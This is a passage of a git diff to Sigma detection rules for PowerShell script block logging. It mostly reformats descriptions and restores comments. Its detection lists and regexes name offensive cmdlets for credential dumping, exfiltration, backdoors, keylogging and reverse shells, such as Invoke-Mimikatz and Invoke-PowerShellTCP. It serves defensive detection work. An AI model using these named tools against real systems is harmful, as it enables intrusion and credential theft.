\$env:ComSpec\[(\s*\d{1,3}\s*,){2} + - ScriptBlockText|re: \*mdr\*\W\s*\)\.Name + - ScriptBlockText|re: \$VerbosePreference\.ToString\( condition: ps_script and selection_iex falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml index cb86cea3b..6b99c42f0 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_stdin.yml @@ -3,7 +3,7 @@ id: 779c8c12-0eb1-11eb-adc1-0242ac120002 status: test description: Detects Obfuscated use of stdin to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 25) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/12/03 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml index a424a28be..3af9d8522 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_var.yml @@ -3,7 +3,7 @@ id: 0adfbc14-0ed1-11eb-adc1-0242ac120002 status: test description: Detects Obfuscated use of Environment Variables to execute PowerShell references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 24) author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2022/12/02 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml index 44abd46f9..b08d21b0e 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_compress.yml @@ -3,7 +3,7 @@ id: 20e5497e-331c-4cd5-8d36-935f6e2a9a07 status: test description: Detects Obfuscated Powershell via COMPRESS OBFUSCATION references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 19) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2022/11/29 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml index a6d3fbf56..d804f7017 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_rundll.yml @@ -3,7 +3,7 @@ id: e6cb92b4-b470-4eb8-8a9d-d63e8583aae0 status: test description: Detects Obfuscated Powershell via RUNDLL LAUNCHER references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task 23) author: Timur Zinniatullin, oscd.community date: 2020/10/18 modified: 2022/11/29 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml index 1826f9639..6bb5ef638 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_stdin.yml @@ -3,7 +3,7 @@ id: 86b896ba-ffa1-4fea-83e3-ee28a4c915c7 status: test description: Detects Obfuscated Powershell via Stdin in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task28) author: Nikita Nazarov, oscd.community date: 2020/10/12 modified: 2022/11/29 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml index 4b150329f..4e3d410d0 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_clip.yml @@ -3,7 +3,7 @@ id: db92dd33-a3ad-49cf-8c2c-608c3e30ace0 status: test description: Detects Obfuscated Powershell via use Clip.exe in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task29) author: Nikita Nazarov, oscd.community date: 2020/10/09 modified: 2022/11/29 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml index 9c08186d1..7503bb599 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_use_mhsta.yml @@ -3,7 +3,7 @@ id: e55a5195-4724-480e-a77e-3ebe64bd3759 status: test description: Detects Obfuscated Powershell via use MSHTA in Scripts references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task31) author: Nikita Nazarov, oscd.community date: 2020/10/08 modified: 2022/11/29 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml index 9ee18757a..197fb9a4c 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_invoke_obfuscation_via_var.yml @@ -3,7 +3,7 @@ id: e54f5149-6ba3-49cf-b153-070d24679126 status: test description: Detects Obfuscated Powershell via VAR++ LAUNCHER references: - - https://github.com/SigmaHQ/sigma/issues/1009 + - https://github.com/SigmaHQ/sigma/issues/1009 # (Task27) author: Timur Zinniatullin, oscd.community date: 2020/10/13 modified: 2022/12/02 @@ -23,7 +23,7 @@ detection: - Microsoft-Windows-PowerShell/Operational - PowerShellCore/Operational selection_4104: - ScriptBlockText|re: (?i).*&&set.*(\{\d\}){2,}\\"\s+?-f.*&&.*cmd.*/c + ScriptBlockText|re: (?i).*&&set.*(\{\d\}){2,}\\"\s+?-f.*&&.*cmd.*/c # FPs with |\/r condition: ps_script and selection_4104 falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_keylogging.yml b/sigma/builtin/powershell/powershell_script/posh_ps_keylogging.yml index 459d1732b..8fda2616a 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_keylogging.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_keylogging.yml @@ -1,8 +1,7 @@ title: Powershell Keylogging id: 34f90d3c-c297-49e9-b26d-911b05a4866c status: test -description: Adversaries may log user keystrokes to intercept credentials as the user - types them. +description: Adversaries may log user keystrokes to intercept credentials as the user types them. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1 @@ -24,7 +23,7 @@ detection: - PowerShellCore/Operational selection_basic: ScriptBlockText|contains: Get-Keystrokes - selection_high: + selection_high: # want to run in background and keyboard ScriptBlockText|contains|all: - Get-ProcAddress user32.dll GetAsyncKeyState - Get-ProcAddress user32.dll GetForegroundWindow diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_localuser.yml b/sigma/builtin/powershell/powershell_script/posh_ps_localuser.yml index e0efa25f1..4f9c7dead 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_localuser.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_localuser.yml @@ -1,12 +1,9 @@ title: Powershell LocalAccount Manipulation id: 4fdc44df-bfe9-4fcc-b041-68f5a2d3031c status: test -description: 'Adversaries may manipulate accounts to maintain access to victim systems. - - Account manipulation may consist of any action that preserves adversary access - to a compromised account, such as modifying credentials or permission groups - - ' +description: | + Adversaries may manipulate accounts to maintain access to victim systems. + Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1098/T1098.md#atomic-test-1---admin-account-manipulate - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.localaccounts/?view=powershell-5.1 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_mailboxexport_share.yml b/sigma/builtin/powershell/powershell_script/posh_ps_mailboxexport_share.yml index 3a1c32972..0fba3c05f 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_mailboxexport_share.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_mailboxexport_share.yml @@ -1,11 +1,10 @@ title: Suspicious PowerShell Mailbox Export to Share - PS id: 4a241dea-235b-4a7e-8d76-50d817b146c4 related: - - id: 889719ef-dd62-43df-86c3-768fb08dc7c0 - type: derived + - id: 889719ef-dd62-43df-86c3-768fb08dc7c0 + type: derived status: test -description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports - a mailbox to a remote or local share, as used in ProxyShell exploitations +description: Detects usage of the powerShell New-MailboxExportRequest Cmdlet to exports a mailbox to a remote or local share, as used in ProxyShell exploitations references: - https://youtu.be/5mqid-7zp8k?t=2481 - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_malicious_commandlets.yml b/sigma/builtin/powershell/powershell_script/posh_ps_malicious_commandlets.yml index 639e92639..ce53f0374 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_malicious_commandlets.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_malicious_commandlets.yml @@ -1,14 +1,14 @@ title: Malicious PowerShell Commandlets - ScriptBlock id: 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 related: - - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c - type: similar - - id: 02030f2f-6199-49ec-b258-ea71b07e03dc - type: similar - - id: 6d3f1399-a81c-4409-aff3-1ecfe9330baf - type: obsoletes - - id: 83083ac6-1816-4e76-97d7-59af9a9ae46e - type: obsoletes + - id: 7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c + type: similar + - id: 02030f2f-6199-49ec-b258-ea71b07e03dc + type: similar + - id: 6d3f1399-a81c-4409-aff3-1ecfe9330baf + type: obsoletes + - id: 83083ac6-1816-4e76-97d7-59af9a9ae46e + type: obsoletes status: test description: Detects Commandlet names from well-known PowerShell exploitation frameworks references: @@ -18,9 +18,9 @@ references: - https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1 - https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1 - https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1 - - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ - - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ - - https://github.com/calebstewart/CVE-2021-1675 + - https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/ # Invoke-TotalExec + - https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/ # Invoke-TotalExec + - https://github.com/calebstewart/CVE-2021-1675 # Invoke-Nightmare - https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1 - https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html - https://github.com/HarmJ0y/DAMP @@ -30,9 +30,7 @@ references: - https://github.com/Kevin-Robertson/Powermad - https://github.com/adrecon/ADRecon - https://github.com/adrecon/AzureADRecon -author: Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine - Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, - Tobias Michalski, Austin Songer +author: Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer date: 2017/03/05 modified: 2023/11/22 tags: @@ -58,6 +56,7 @@ detection: - PowerShellCore/Operational selection: ScriptBlockText|contains: + # Note: Please ensure alphabetical order when adding new entries - Add-Exfiltration - Add-Persistence - Add-RegBackdoor @@ -144,7 +143,7 @@ detection: - Invoke-Farmer - Invoke-Get-RBCD-Threaded - Invoke-Gopher - - Invoke-Grouper + - Invoke-Grouper # Also Covers Invoke-GrouperX - Invoke-HandleKatz - Invoke-ImpersonatedProcess - Invoke-ImpersonateSystem @@ -168,7 +167,7 @@ detection: - Invoke-P0wnedshell - Invoke-Paranoia - Invoke-PortScan - - Invoke-PoshRatHttp + - Invoke-PoshRatHttp # Also Covers Invoke-PoshRatHttps - Invoke-PostExfil - Invoke-PowerDump - Invoke-PowerShellTCP @@ -187,7 +186,7 @@ detection: - Invoke-Seatbelt - Invoke-ServiceAbuse - Invoke-ShadowSpray - - Invoke-Sharp + - Invoke-Sharp # Covers all "Invoke-Sharp" variants - Invoke-Shellcode - Invoke-SMBScanner - Invoke-Snaffler @@ -229,15 +228,32 @@ detection: - Remove-Update - Rename-ADIDNSNode - Revoke-ADIDNSPermission - - Set-ADIDNSNode + - Set-ADIDNSNode # Covers: Set-ADIDNSNodeAttribute, Set-ADIDNSNodeOwner - Show-TargetScreen - Start-CaptureServer - Start-WebcamRecorder - VolumeShadowCopyTools + # - 'Check-VM' + # - 'Disable-MachineAccount' + # - 'Enable-MachineAccount' + # - 'Get-ApplicationHost' + # - 'Get-MachineAccountAttribute' + # - 'Get-MachineAccountCreator' + # - 'Get-Screenshot' + # - 'HTTP-Login' + # - 'Install-ServiceBinary' + # - 'Install-SSP' + # - 'New-DNSRecordArray' + # - 'New-MachineAccount' + # - 'Port-Scan' + # - 'Remove-MachineAccount' + # - 'Set-MacAttribute' + # - 'Set-MachineAccountAttribute' + # - 'Set-Wallpaper' filter_optional_amazon_ec2: ScriptBlockText|contains: - - Get-SystemDriveInfo - - C:\ProgramData\Amazon\EC2-Windows\Launch\Module\ + - Get-SystemDriveInfo # http://bheltborg.dk/Windows/WinSxS/amd64_microsoft-windows-maintenancediagnostic_31bf3856ad364e35_10.0.10240.16384_none_91ef7543a4514b5e/CL_Utility.ps1 + - C:\ProgramData\Amazon\EC2-Windows\Launch\Module\ # false positive form Amazon EC2 condition: ps_script and (selection and not 1 of filter_optional_*) falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_malicious_keywords.yml b/sigma/builtin/powershell/powershell_script/posh_ps_malicious_keywords.yml index 12a755618..12bb297c8 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_malicious_keywords.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_malicious_keywords.yml @@ -24,6 +24,7 @@ detection: ScriptBlockText|contains: - AdjustTokenPrivileges - IMAGE_NT_OPTIONAL_HDR64_MAGIC + # - 'LSA_UNICODE_STRING' - Metasploit - Microsoft.Win32.UnsafeNativeMethods - Mimikatz @@ -43,7 +44,6 @@ detection: - TOKEN_QUERY condition: ps_script and selection falsepositives: - - Depending on the scripts, this rule might require some initial tuning to fit - the environment + - Depending on the scripts, this rule might require some initial tuning to fit the environment level: medium ruletype: Sigma diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml b/sigma/builtin/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml index 08543a7f7..501784b90 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_memorydump_getstoragediagnosticinfo.yml @@ -1,8 +1,7 @@ title: Live Memory Dump Using Powershell id: cd185561-4760-45d6-a63e-a51325112cae status: test -description: Detects usage of a PowerShell command to dump the live memory of a Windows - machine +description: Detects usage of a PowerShell command to dump the live memory of a Windows machine references: - https://docs.microsoft.com/en-us/powershell/module/storage/get-storagediagnosticinfo author: Max Altgelt (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml b/sigma/builtin/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml index 4442833d6..eac6e1e76 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml @@ -1,11 +1,10 @@ title: Modify Group Policy Settings - ScriptBlockLogging id: b7216a7d-687e-4c8d-82b1-3080b2ad961f related: - - id: ada4b0c4-758b-46ac-9033-9004613a150d - type: similar + - id: ada4b0c4-758b-46ac-9033-9004613a150d + type: similar status: test -description: Detect malicious GPO modifications can be used to implement many other - malicious behaviors. +description: Detect malicious GPO modifications can be used to implement many other malicious behaviors. references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_msxml_com.yml b/sigma/builtin/powershell/powershell_script/posh_ps_msxml_com.yml index 87fe6ecd7..1a1e8fabc 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_msxml_com.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_msxml_com.yml @@ -1,15 +1,10 @@ title: Powershell MsXml COM Object id: 78aa1347-1517-4454-9982-b338d6df8343 status: test -description: 'Adversaries may abuse PowerShell commands and scripts for execution. - - PowerShell is a powerful interactive command-line interface and scripting environment - included in the Windows operating system. (Citation: TechNet PowerShell) - - Adversaries can use PowerShell to perform a number of actions, including discovery - of information and execution of code - - ' +description: | + Adversaries may abuse PowerShell commands and scripts for execution. + PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) + Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-7---powershell-msxml-com-object---with-prompt - https://docs.microsoft.com/en-us/previous-versions/windows/desktop/ms766431(v=vs.85) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml b/sigma/builtin/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml index d11c70f4e..d9ce4f691 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_nishang_malicious_commandlets.yml @@ -1,8 +1,7 @@ title: Malicious Nishang PowerShell Commandlets id: f772cee9-b7c2-4cb2-8f07-49870adc02e0 status: test -description: Detects Commandlet names and arguments from the Nishang exploitation - framework +description: Detects Commandlet names and arguments from the Nishang exploitation framework references: - https://github.com/samratashok/nishang author: Alec Costello @@ -24,6 +23,9 @@ detection: selection: ScriptBlockText|contains: - Add-ConstrainedDelegationBackdoor + # - 'Add-Persistence' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 + # - 'Add-RegBackdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 + # - 'Add-ScrnSaveBackdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - Copy-VSS - Create-MultipleSessions - DataToEncode @@ -46,12 +48,15 @@ detection: - FakeDC - FireBuster - FireListener - - 'Get-Information ' + - 'Get-Information ' # Space at the end is required. Otherwise, we get FP with Get-InformationBarrierReportDetails or Get-InformationBarrierReportSummary + # - 'Get-PassHashes' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - Get-PassHints - Get-Web-Credentials - Get-WebCredentials - Get-WLAN-Keys + # - 'Gupt-Backdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - HTTP-Backdoor + # - 'Invoke-ADSBackdoor' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - Invoke-AmsiBypass - Invoke-BruteForce - Invoke-CredentialsPhish @@ -62,16 +67,21 @@ detection: - Invoke-JSRatRundll - Invoke-MimikatzWDigestDowngrade - Invoke-NetworkRelay + # - 'Invoke-PortScan' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 + # - 'Invoke-PoshRatHttp' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - Invoke-PowerShellIcmp - Invoke-PowerShellUdp - Invoke-Prasadhak - Invoke-PSGcat - Invoke-PsGcatAgent + # - 'Invoke-PsUACme' # Covered in 89819aa4-bbd6-46bc-88ec-c7f7fe30efa6 - Invoke-SessionGopher - Invoke-SSIDExfil + # - Jitter # Prone to FPs + # - 'Keylogger' # Too generic to be linked to Nishang - LoggedKeys - Nishang - - NotAllNameSpaces + - NotAllNameSpaces # This is param to "Set-RemoteWMI" - Out-CHM - OUT-DNSTXT - Out-HTA diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_ntfs_ads_access.yml b/sigma/builtin/powershell/powershell_script/posh_ps_ntfs_ads_access.yml index 7b0e21573..a1b7e0ac6 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_ntfs_ads_access.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_ntfs_ads_access.yml @@ -1,8 +1,7 @@ title: NTFS Alternate Data Stream id: 8c521530-5169-495d-a199-0a3a881ad24e status: test -description: Detects writing data into NTFS alternate data streams from powershell. - Needs Script Block Logging. +description: Detects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging. references: - http://www.powertheshell.com/ntfsstreams/ - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml b/sigma/builtin/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml index 36f9e6472..62fe0e37b 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_office_comobject_registerxll.yml @@ -1,12 +1,9 @@ title: Code Executed Via Office Add-in XLL File id: 36fbec91-fa1b-4d5d-8df1-8d8edcb632ad status: test -description: 'Adversaries may abuse Microsoft Office add-ins to obtain persistence - on a compromised system. - +description: | + Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs - - ' references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137.006/T1137.006.md author: frack113 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml b/sigma/builtin/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml index fba57043e..ad158af32 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_potential_invoke_mimikatz.yml @@ -1,8 +1,7 @@ title: Potential Invoke-Mimikatz PowerShell Script id: 189e3b02-82b2-4b90-9662-411eb64486d4 status: test -description: Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential - dumper capable of obtaining plaintext Windows account logins and passwords. +description: Detects Invoke-Mimikatz PowerShell script and alike. Mimikatz is a credential dumper capable of obtaining plaintext Windows account logins and passwords. references: - https://www.elastic.co/guide/en/security/current/potential-invoke-mimikatz-powershell-script.html#potential-invoke-mimikatz-powershell-script author: Tim Rauch diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml b/sigma/builtin/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml index 75451bddb..da370ae2f 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml @@ -1,8 +1,8 @@ title: PowerView PowerShell Cmdlets - ScriptBlock id: dcd74b95-3f36-4ed9-9598-0490951643aa related: - - id: b2317cfa-4a47-4ead-b3ff-297438c0bc2d - type: similar + - id: b2317cfa-4a47-4ead-b3ff-297438c0bc2d + type: similar status: test description: Detects Cmdlet names from PowerView of the PowerSploit exploitation framework. references: @@ -39,7 +39,7 @@ detection: - Find-ForeignUser - Find-GPOComputerAdmin - Find-GPOLocation - - Find-InterestingDomain + - Find-InterestingDomain # Covers: Find-InterestingDomainAcl, Find-InterestingDomainShareFile - Find-InterestingFile - Find-LocalAdminAccess - Find-ManagedSecurityGroups @@ -55,7 +55,7 @@ detection: - Get-LastLoggedOn - Get-LoggedOnLocal - Get-NetFileServer - - Get-NetForest + - Get-NetForest # Covers: Get-NetForestCatalog, Get-NetForestDomain, Get-NetForestTrust - Get-NetGPOGroup - Get-NetProcess - Get-NetRDPSession @@ -80,6 +80,58 @@ detection: - Remove-RemoteConnection - Request-SPNTicket - Resolve-IPAddress + # - 'Get-ADObject' # prone to FPs + # - 'Get-Domain' # too many FPs # Covers Cmdlets like: DomainComputer, DomainController, DomainDFSShare, DomainDNSRecord, DomainGPO, etc. + # - 'Add-DomainGroupMember' + # - 'Add-DomainObjectAcl' + # - 'Add-ObjectAcl' + # - 'Add-RemoteConnection' + # - 'Convert-ADName' + # - 'Convert-NameToSid' + # - 'ConvertFrom-UACValue' + # - 'ConvertTo-SID' + # - 'Get-DNSRecord' + # - 'Get-DNSZone' + # - 'Get-DomainComputer' + # - 'Get-DomainController' + # - 'Get-DomainGroup' + # - 'Get-DomainGroupMember' + # - 'Get-DomainManagedSecurityGroup' + # - 'Get-DomainObject' + # - 'Get-DomainObjectAcl' + # - 'Get-DomainOU' + # - 'Get-DomainPolicy' + # - 'Get-DomainSID' + # - 'Get-DomainSite' + # - 'Get-DomainSPNTicket' + # - 'Get-DomainSubnet' + # - 'Get-DomainUser' + # - 'Get-DomainUserEvent' + # - 'Get-Forest' # Covers: Get-ForestDomain, Get-ForestGlobalCatalog, Get-ForestTrust + # - 'Get-IPAddress' + # - 'Get-NetComputer' # Covers: Get-NetComputerSiteName + # - 'Get-NetDomain' # Covers: Get-NetDomainController, Get-NetDomainTrust + # - 'Get-NetGroup' # Covers: Get-NetGroupMember + # - 'Get-NetLocalGroup' # Covers: NetLocalGroupMember + # - 'Get-NetLoggedon' + # - 'Get-NetOU' + # - 'Get-NetSession' + # - 'Get-NetShare' + # - 'Get-NetSite' + # - 'Get-NetSubnet' + # - 'Get-NetUser' + # - 'Get-ObjectAcl' + # - 'Get-PathAcl' + # - 'Get-Proxy' + # - 'Get-SiteName' + # - 'Get-UserEvent' + # - 'Get-WMIProcess' + # - 'New-DomainGroup' + # - 'New-DomainUser' + # - 'Set-ADObject' + # - 'Set-DomainObject' + # - 'Set-DomainUserPassword' + # - 'Test-AdminAccess' condition: ps_script and selection falsepositives: - Unknown diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_psasyncshell.yml b/sigma/builtin/powershell/powershell_script/posh_ps_psasyncshell.yml index 11df4c42f..195a7909e 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_psasyncshell.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_psasyncshell.yml @@ -1,8 +1,7 @@ title: PSAsyncShell - Asynchronous TCP Reverse Shell id: afd3df04-948d-46f6-ae44-25966c44b97f status: test -description: Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written - in powershell +description: Detects the use of PSAsyncShell an Asynchronous TCP Reverse Shell written in powershell references: - https://github.com/JoelGMSec/PSAsyncShell author: Nasreddine Bencherchali (Nextron Systems) diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_remote_session_creation.yml b/sigma/builtin/powershell/powershell_script/posh_ps_remote_session_creation.yml index 493f0dc98..b97dd5ea9 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_remote_session_creation.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_remote_session_creation.yml @@ -1,12 +1,9 @@ title: PowerShell Remote Session Creation id: a0edd39f-a0c6-4c17-8141-261f958e8d8f status: test -description: 'Adversaries may abuse PowerShell commands and scripts for execution. - - PowerShell is a powerful interactive command-line interface and scripting environment - included in the Windows operating system - - ' +description: | + Adversaries may abuse PowerShell commands and scripts for execution. + PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle - https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2 diff --git a/sigma/builtin/powershell/powershell_script/posh_ps_remotefxvgpudisablement_abuse.yml b/sigma/builtin/powershell/powershell_script/posh_ps_remotefxvgpudisablement_abuse.yml index 19d00252a..b32f7931f 100644 --- a/sigma/builtin/powershell/powershell_script/posh_ps_remotefxvgpudisablement_abuse.yml +++ b/sigma/builtin/powershell/powershell_script/posh_ps_remotefxvgpudisablement_abuse.yml @@ -1,17 +1,14 @@ title: Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlock id: cacef8fc-9d3d-41f7-956d-455c6e881bc5 related: - - id: 